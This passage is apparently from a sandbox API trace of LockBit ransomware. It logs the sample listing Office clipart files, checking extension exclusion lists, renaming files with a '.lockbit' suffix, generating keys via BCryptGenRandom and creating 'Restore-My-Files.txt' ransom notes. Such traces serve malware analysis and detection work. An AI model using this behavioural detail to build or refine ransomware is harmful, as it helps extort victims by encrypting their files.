(lpString1="thumbs.db", lpString2="SO02228_.WMF") returned 1 [0177.036] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02228_.WMF") returned -1 [0177.037] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.037] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02228_.WMF") returned=".WMF" [0177.037] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.037] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.037] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.038] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.038] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.038] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02228_.WMF.lockbit") returned 72 [0177.038] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02228_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02228_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0177.039] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.039] malloc (_Size=0x40068) returned 0x3e70008 [0177.039] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=820) returned 1 [0177.039] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.039] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0177.039] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.040] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0177.040] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0177.044] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02228_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02228_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.044] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.044] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.045] free (_Block=0x1fa2ed8) [0177.045] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02228_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.045] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.045] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.045] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcd30a00, ftCreationTime.dwHighDateTime=0x1bd4bf9, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdcd30a00, ftLastWriteTime.dwHighDateTime=0x1bd4bf9, nFileSizeHigh=0x0, nFileSizeLow=0x900, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02233_.WMF", cAlternateFileName="")) returned 1 [0177.045] lstrcmpiW (lpString1=".", lpString2="SO02233_.WMF") returned -1 [0177.045] lstrcmpiW (lpString1="..", lpString2="SO02233_.WMF") returned -1 [0177.045] PathFindExtensionW (pszPath="SO02233_.WMF") returned=".WMF" [0177.045] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.045] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.045] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.045] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.045] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.045] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.045] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.046] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.046] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02233_.WMF") returned -1 [0177.047] lstrcmpiW (lpString1="ntldr", lpString2="SO02233_.WMF") returned -1 [0177.047] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02233_.WMF") returned -1 [0177.047] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02233_.WMF") returned -1 [0177.047] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02233_.WMF") returned -1 [0177.047] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02233_.WMF") returned 1 [0177.047] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02233_.WMF") returned -1 [0177.047] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.047] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02233_.WMF") returned=".WMF" [0177.047] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.047] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.047] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.048] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.048] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02233_.WMF.lockbit") returned 72 [0177.048] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02233_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02233_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0177.049] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.050] malloc (_Size=0x40068) returned 0x3ef0008 [0177.050] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2304) returned 1 [0177.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.050] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0177.050] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.051] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0177.051] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0177.055] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02233_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02233_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.055] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.055] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.056] free (_Block=0x1fa2ed8) [0177.056] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02233_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.056] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.056] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.056] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73eb9200, ftCreationTime.dwHighDateTime=0x1bd4bf9, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73eb9200, ftLastWriteTime.dwHighDateTime=0x1bd4bf9, nFileSizeHigh=0x0, nFileSizeLow=0xe88, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02252_.WMF", cAlternateFileName="")) returned 1 [0177.056] lstrcmpiW (lpString1=".", lpString2="SO02252_.WMF") returned -1 [0177.056] lstrcmpiW (lpString1="..", lpString2="SO02252_.WMF") returned -1 [0177.056] PathFindExtensionW (pszPath="SO02252_.WMF") returned=".WMF" [0177.056] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.057] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.058] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.058] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO02252_.WMF") returned -1 [0177.058] lstrcmpiW (lpString1="ntldr", lpString2="SO02252_.WMF") returned -1 [0177.059] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO02252_.WMF") returned -1 [0177.059] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO02252_.WMF") returned -1 [0177.059] lstrcmpiW (lpString1="autorun.inf", lpString2="SO02252_.WMF") returned -1 [0177.059] lstrcmpiW (lpString1="thumbs.db", lpString2="SO02252_.WMF") returned 1 [0177.059] lstrcmpiW (lpString1="iconcache.db", lpString2="SO02252_.WMF") returned -1 [0177.059] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.059] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02252_.WMF") returned=".WMF" [0177.059] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.059] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.059] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.060] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.060] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.060] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.060] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.060] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.060] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.060] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.060] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.060] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.060] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.060] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.060] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02252_.WMF.lockbit") returned 72 [0177.060] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02252_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.064] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.064] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.064] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3720) returned 1 [0177.065] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.065] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.065] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.065] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.065] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.067] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02252_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02252_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.067] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.067] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.069] free (_Block=0x1fa2ed8) [0177.069] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02252_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.069] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.069] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.069] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f26de00, ftCreationTime.dwHighDateTime=0x1bd4bf9, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6f26de00, ftLastWriteTime.dwHighDateTime=0x1bd4bf9, nFileSizeHigh=0x0, nFileSizeLow=0x8e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO02253_.WMF", cAlternateFileName="")) returned 1 [0177.069] lstrcmpiW (lpString1=".", 